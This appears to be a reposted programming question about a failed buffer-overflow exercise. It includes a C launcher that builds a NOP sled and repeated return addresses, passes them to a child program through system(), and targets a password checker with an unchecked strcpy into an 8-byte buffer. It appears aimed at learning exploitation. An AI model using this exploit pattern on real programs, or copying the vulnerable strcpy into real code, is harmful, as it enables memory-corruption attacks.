I am executing a program B from the main function of another program A by C library function system(). But when I am passing an address of the A to the B as an argument to replace the return address in the process B by buffer overflow, it is showing segmentation fault.
I know each process cannot access address space of another process. But is there any way I can buffer overflow the child process so that execution returns to the parent process? I am using x64 bit machine and gcc with -m32, -fno-stack-protector options.
This is the program A from where I am executing another program B:
int main(int argc, char *argv[]) {
unsigned int i, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./child '"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // add NOP instructions
strcat(command, "'");
system(command); // run another program
free(command);
}
And this is the other program B which is vulnerable to buffer overflow
int testAuthenetication(char *password){
int value = 0;
char buffer[8];
strcpy(buffer, password);
if(strcmp(buffer, "abcd") == 0){
value = 1;
}
if(strcmp(buffer, "abcdef") == 0){
value = 1;
}
return value;
}
int main(int argc, char *argv[]){
if(argc < 2){
printf("Enter the password n");
return 0;
}
if(testAuthenetication(argv[1])){
printf("Access Granted n");
}
else{
printf("Access denied n");
}
return 0;
}
Aucun commentaire:
Enregistrer un commentaire